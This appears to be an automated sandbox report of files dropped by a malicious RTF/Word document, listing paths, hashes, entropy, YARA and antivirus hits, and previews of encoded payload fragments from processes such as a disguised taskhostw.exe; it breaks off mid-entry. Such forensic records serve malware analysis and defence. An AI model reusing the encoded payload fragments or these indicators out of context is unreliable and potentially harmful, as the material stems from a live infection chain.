SHA-512:	D82B5ECC391F92E17161CE7B98F62B273F9A51D6C294272AACC1EFA1B2D2DC7C8C1095103197D6FE023B21D8B161978C4C6073AED78758649031DA99FD687D9C
Malicious:	false
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc, Author: ditekSHen
Preview:	{\rtf1..{\\fuAM1lx8ZkPnbkOCimO5dV3rHvsM8U67kI1ddcL4KhvChijOW80CM7opbLd7k2Mg4EWGPEhOERIGzLNu}..{\2132927736(??80.<2?\|]-~.(`,,($$%3%>?['%?970`6@9%24?%>=!/?9]%.`_:=..-!8]6?.2+>4<33=[?.$]&%/~-6>+_#,%?:;-9,?(\|6'=8&-69%.9[=~).[4^@?3%:%].$?0/^3?!4]%]=1).?9`<$]0.2>;?@15,?19?'!!:???).6219.?<9?#',?@.)>\|94,!<%'.?$??:>'?9]_`<+]3`=.%0./.2?.\|^0..7/>0&.3/5%]\|[!/3&4?%~?.\|9#7]>--,~1`%.)>]?\|+1^\|6/35'?/310&.^??8-,?8^/9:00\|`:_^)>+&?,?2+#?[$\|1+'$??(%.(@=7.)?%,26?<5?:^9.*_%!2?;1.0>^`7.!?)7>83?`]7.(3?4+0<=)%+~8?9?(?3^/@9_:&%5.'^324_0!]48'[??.7#2~4?>~=4?[0(7@>@.?5%.3.6$1@??=.?-01!`(@53.@$8$#9#?`.($5?:\|9#?%#@__?&?$?/6./5~>(?\|0(/.#_??%.\|,#-[@18.?_%.=?<~\|1/96[^3,~4?>-+=#=.\|,/`;:~&??<]%?.[].78?.09.4..(_?.''(?!@]?@%_~/@%#@?.~,~:?@@?2+\|&?++>>#5?\|@=1@..']~89+4~/=:.`5<\|96,??%5>:+=;)9?+&^^7(;!?)<_(`(?`_;:(-=:?.!+@?=2~;???.??:9?9<7<)0%;6%7~%'??1~2],3?5_?0].'2>$'48:,/=<:=[$??<=3?:1.;>7:4>^\|9]^'4=+[^*~&%+@-?\|`&.!].@\|:9%;[+4?-<'@5)6?.%62?=-)>&(.>(89`&83'?.'-\|?.'','/?:]3`.?\|$4=.%%2\|^^[78++?:<5)[2\|4]?$'=

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	2.586762147643526
Encrypted:	false
SSDEEP:	96:NC5MPCF9zDGqIH7fdbuHPhxHMP1F9z7GqIH7fdbuHPhx:NjPCrdI78vh+P1r1I78vh
MD5:	662ABA45E30897D16AD40638A1569440
SHA1:	631E19B06BACB43D41361BA167AC1FA65EC6F005
SHA-256:	66CD190E24235D876A084F11F47477BD8F1E94882FE8E1E6FF53BEDE0D219297
SHA-512:	5539B3E12B585BDCD447449745EE21FA91E0714A37C6CBEBD32086E61080320B56DDDB28B4EA228D0BE504C1B3A39918FC883FF0BA432857753AEC12D95A5E1D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E97EAB0-20B9-4BC8-840D-AF89CC135711}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ED10E989-6710-496F-A882-ADFC8718EE13}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	3.5642856656705773
Encrypted:	false
SSDEEP:	384:Mt6D48CJfyMb7EyonNGiRl6yjRA0yLejsItgQnl8HbAj77YM:+Tloy+fpVZyWsItKHcjgM
MD5:	99035C431377FE236500A36805A8D212
SHA1:	DB158A2376A3392B59F9D121101A4BB4BE8A952A
SHA-256:	CF987610C85B609396FB020102B150965D45A49E44E8535F3708414E52A2F4AA
SHA-512:	A7B060B4373679FB9262EBC2C81D8C2CE81DB21E0FF4A7C6AEA9ADB06A6E7C42B5291C9454E9A2E175A0B9000A06B391098054BC4B9E8C6937AD3120219F41C5
Malicious:	false
Preview:	1.3.2.9.2.7.7.3.6.(.?.?.8.0...<.2.?.\|.].-.~...(.`.,.,.(.$.$.%.3.%.>..?.[.'.%.?.9.7.0.`.6.@.9.%.2.4.?.%.>.=.!./.?.9.]..%...`._.:.=......-.!.8.].6.?....2.+.>.4.<.3.3.=.[.?...$.].&.%./.~.-.6.>.+._.#.,.%.?.:.;.-.9.,.?.(.\|.6.'.=.8.&.-.6.9.%...9.[.=..~.)....[.4.^.@.?.3.%.:.%.]...$.?.0./.^.3.?.!.4.].%.].=.1.)...?.9.`.<.$.].0...2.>.;.?.@.1.5.,.?.1.9.?.'.!.!.:.?.?.?.)...6.2.1..9...?.<.9.?.#.'.,..?.@...).>.\|.9.4.,.!.<.%.'...?..$.?.?.:.>.'.?.9.]._.`.<.+.].3.`.=...%.0.../...2.?...\|.^.0.....7./.>.0.&...3./.5.%.].\|.[.!./.3.&.4.?.%.~.?...\|.9.#.7.].>.-.-.,.~.1.`.%...).>.].?.\|.+.1.^.\|.6./.3.5.'.?./.3.1.0.&...^.?.?.8.-.,.?.8.^./.9.:.0.0.\|.`.:._.^.).>.+.&.?.,.?.2.+.#.?.[.$.\|.1.+.'.$.?.?.(.%...(.@.=.7...).?.%.,.2.6.?.<.5.?.:.^.9....._.%.!.2.?.;.1...0.>.^.`.7...!.?.).7.>.8.3.?.`.].7...(.3.?.4.+.0.<.=.).%.+.~.8.?.9.?.(.?.3.^./.@.9._.:.&.%.5...'.^.3.2.4._.0.!.]..4.8.'.[.?.?...7.#.2.~.4.?.>.~.=.4.?.[.0.(.7.@.>.@...?.5.%...*.3...6.$.1.@.?.?.=...?.-.0.1.!.`.(.@.5.3...@.$.8.$.#.9.#.?.`...(.$.5.?.:.\|.

C:\Users\user\AppData\Local\Temp\Citlaltpetl

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	data
Category:	dropped
Size (bytes):	494592
Entropy (8bit):	7.5383843814540175
Encrypted:	false
SSDEEP:	12288:iU98JzlqYLe9tSpC5R8F0B5hAKmUAhVAoMIAj:2s2e9tS08FK5MUN1j
MD5:	68E968B0759CF46217226477C26C2FB0
SHA1:	ACBB76B2C0808F932D217AE73184BA14B18D27B8
SHA-256:	604A0CC31BA6D8753E394982E8B84A59B260179B2313F314CAC53CEB663C996B
SHA-512:	8016E87C2B29BE1802DF384F46F0568EF4EA2BE22732BD554AA7E95FF12373B0381AD0CFD8CA1C795E8B5D7DC94E210ACC8F32DD21CBBCA4ECB42D6E48FA8709
Malicious:	false
Preview:	...IBRXL=83R..IA.XL983RZ.IARXL983RZIIARXL983RZIIARXL983RZIIAJYL96,.TI.H.y.8t.s.! 2r(>V_A37i* <6#M.Q7z;</r1".\|\|.z$&%7vA42.RZIIARX@B...@.7.H.2q".,..n?.B.G.w$.S.,...FeH.7.#.&.#.M..X7.H.2.\|.-.S.?...FJ).$...-2V.Fr0.7.[.&.#.M$A.7...3.".,..`?.B.G.w.%.S.,.%ZP{H.7IARXL983RZIIARXL983RZIIA..L9t2UZ..4XL983RZI.APYG863R(LIADZL983R..JARHL98.WZII.RX\983PZILASXL983WZHIARXL9.;RZMIARXL9:3R.IIQRX\983RJIIQRXL983BZIIARXL983R.OAVYL98.UZA.ARXL983RZIIARXL983R.NI.iXLi.5RbIIARXL983RZIIARXL98.\IQARX..>3.ZIIARXL983RZ.LAR]L983RZIIARXL983RZIIARXL983\|.,15RXL.I6RZYIARI987RZIIARXL983RZIiAR8bK\R&;II.+YL9.6RZ3HAR.I983RZIIARXL98sRZ.g%3,-983..IIAB_L963RZ.OARXL983RZIIAR.L9..&6:IARXE983RNIAPXL9.5RZIIARXL983RZ.IA.v+_QW!ZIyCRXL.?3R^IIAR_L983RZIIARXL9x3R.g;2 ;L98;.ZII.UXLu83R^NIARXL983RZIIA.XLy.A76&*AR.w983.]II}RXLi?3RZIIARXL983R.II.RXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL98

C:\Users\user\AppData\Local\Temp\aut1F25.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	data
Category:	dropped
Size (bytes):	400390
Entropy (8bit):	7.97463545286396
Encrypted:	false
SSDEEP:	12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
MD5:	336DC045C8C6A4764B31D43FD360B020
SHA1:	0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
SHA-256:	D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
SHA-512:	A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
Malicious:	false
Preview:	EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.\|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h...........Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...\|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3f.!\|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.\|..B...4'..

C:\Users\user\AppData\Local\Temp\aut1FE1.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	data
Category:	dropped
Size (bytes):	12940
Entropy (8bit):	7.727914831066413
Encrypted:	false
SSDEEP:	192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
MD5:	A9350F97650A3D649560ABAA38CCBE7C
SHA1:	C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
SHA-256:	912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
SHA-512:	8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
Malicious:	false
Preview:	EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<\|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...\|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...\|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5

C:\Users\user\AppData\Local\Temp\aut259B.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	400390
Entropy (8bit):	7.97463545286396
Encrypted:	false
SSDEEP:	12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
MD5:	336DC045C8C6A4764B31D43FD360B020
SHA1:	0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
SHA-256:	D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
SHA-512:	A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
Malicious:	false
Preview:	EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.\|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h...........Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...\|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3f.!\|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.\|..B...4'..

C:\Users\user\AppData\Local\Temp\aut2638.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	12940
Entropy (8bit):	7.727914831066413
Encrypted:	false
SSDEEP:	192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
MD5:	A9350F97650A3D649560ABAA38CCBE7C
SHA1:	C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
SHA-256:	912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
SHA-512:	8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
Malicious:	false
Preview:	EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<\|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...\|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...\|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5

C:\Users\user\AppData\Local\Temp\aut589C.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	400390
Entropy (8bit):	7.97463545286396
Encrypted:	false
SSDEEP:	12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
MD5:	336DC045C8C6A4764B31D43FD360B020
SHA1:	0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
SHA-256:	D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
SHA-512:	A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
Malicious:	false
Preview:	EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.\|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h...........Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...\|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3f.!\|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.\|..B...4'..

C:\Users\user\AppData\Local\Temp\aut5ADE.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	12940
Entropy (8bit):	7.727914831066413
Encrypted:	false
SSDEEP:	192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
MD5:	A9350F97650A3D649560ABAA38CCBE7C
SHA1:	C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
SHA-256:	912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
SHA-512:	8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
Malicious:	false
Preview:	EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<\|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...\|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...\|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5

C:\Users\user\AppData\Local\Temp\bhv35FF.tmp

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x1fad000f, page size 32768, DirtyShutdown, Windows version 6.1
Category:	dropped
Size (bytes):	21037056
Entropy (8bit):	1.1388616017741526
Encrypted:	false
SSDEEP:	24576:dO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:dOEXs1LuHqqEXwPW+RHA6m1fN
MD5:	FCB38CBE62FC825597AF721A2B9E2B46
SHA1:	27F13F33D3F59E74DF4CBDC663016F5D7DED75F4
SHA-256:	BFEDE9F9A5691EB8E88F12DEF75B6A145882FE57197D30FE064115C4CF34A5CF
SHA-512:	3429FFA2A799634826A3F42FFAD866EA42E96F740BF67129105AF4E3EDB2B71D72CEC1EE504F092073F3732C398D23DF9E66633DAA3800CC5B8EAD6A72D40BB8
Malicious:	false
Preview:	....... ........................u..............................;:...{..('...\|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\teres

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	4.437033064729596
Encrypted:	false
SSDEEP:	768:3B/xREbEXiee0eaPQjby+l5xB3FG60914KhOG7sDUjb6Rc1P:TubEXiegNl5xqbb4KhODUjbKqP
MD5:	8286378171E4C2B52782449814A06653
SHA1:	F950AEA27B1C5416406C248A41253679ED182BFA
SHA-256:	4DC4DEA969F1A530D82D02ED8D72BE00404F8E32973430DC55EAE380F95D92DA
SHA-512:	9B9B2A8BF2B8559EAFC93AE06A6C8C1D3D8ED074353D827CA04E0DE7E1FA5214BFAAF98F645114E826E898B0B9302AB16AAB18D9CA2443D7BC06574605D3EC85
Malicious:	false
Preview:	1z898cgf<1fefg032340688;b98e40123467:<8596e=662340129:8:6g<6cc:601234078;=56:;f87g340123:69;798bd<:512340189<95f;gbb8f40123467:<959ge<342340129:8:68=0c;6601234078;=4e;5fa3g340123:69;8995d;:412340189<957<:b:8f40123467:<8d::ee6d2340129:8:78=a45f467:<85:ee=6f2340129:8::g84ghijfgdd;412340189<9:77:fghijfc:9801234078;=866;jfghijb:8f40123467:<<d5cijfghifa7e340123:69;<94dhijfghe<2f2340129:8::88eghijfgd<:412340189<99f84fghijfcc9g01234078;=9675jfghijb98f40123467:<<566ijfghi73d;9:8::g96ghijfgdd;512340189<967g4b99640123467:<85e4e=662340129:8:6gh4cc:601234078;=56f9f845340123:69;79d9d<7212340189<95fgebb4h40123467:<95eee<652340129:8:68hec;9g01234078;=4eg3fa7e340123:69;89e356g078;=46g7f973340123:69;;h69hijfghee652340129:8:;8:aghijfgd;;612340189<9979gfghijfc;9501234078;=8e8hjfghijbb9340123467:<=582ijfghif87;340123:69;;973hijfghe=342340129:8::g;4ghijfgdd7212340189<9:7::fghijfc:5i01234078;=869;jfghijb:8740123467:<<d8cijfghifa7e340123:69;<97dhijfghe<6d2340129:8::8;eghijfg56g978;=4e:3fa85340123:69;89a1d;:8

C:\Users\user\AppData\Local\Temp\{5DAD5114-8DEA-497E-ADB3-F2602CE15FDA}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025493604434434047
Encrypted:	false
SSDEEP:	6:I3DPc+7O9HvxggLRFCAQ3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPZuPuvYg3J/
MD5:	69D299397149C93558E1A04EC1453160
SHA1:	F2D1B95DA0CD6B6165477524B432298B09C86A32
SHA-256:	3C91B7A639D36EE8EE4AE2B02EAF3269A75B02230AD90EE000E335DE3FFDF2F9
SHA-512:	E5BE3098F0BEB6FEFA6253D723E950AA09C90E87D30638313C8981802512F32759224A8FF5FEBB3B11CE3D3CE0BF3F3A0EF804FD77A3EBF80AE095C94339CC3F
Malicious:	false
Preview:	......M.eFy...z....T.K...V...[S,...X.F...Fa.q............................I.=mD.J...(,H........=.V...L...s`.F......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{C26A3DF4-1C3C-44DD-BDE3-B2D681DFE989}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02573908657392288
Encrypted:	false
SSDEEP:	6:I3DPcHvyoKuP9HvxggLRj8/etf/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPU9PPceZbvYg3J/
MD5:	21DCCF6BAE0719DCDB0533E1E50F6D82
SHA1:	44A5CF1723E1EBED117FB33C384718A14C6DB7E0
SHA-256:	A4C7250EBCD74226AD8A7B0398E56DFCD0DD86A7F1A46790454F4025119DC8CA
SHA-512:	02EACD9F7DAA5227CA839D77B719203CCB514B8784CEF013E8CC9CB50788B145212F516905680FA5ECEC160CD87951C33F6D3A66AB513F32158280E46D717AB8
Malicious:	false
Preview:	......M.eFy...z@r.'m..C..[..1.+S,...X.F...Fa.q............................t...7.sB..."...6............D.CG....".u......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCD702BC6860229DC.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE2432C56C8FA8778.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
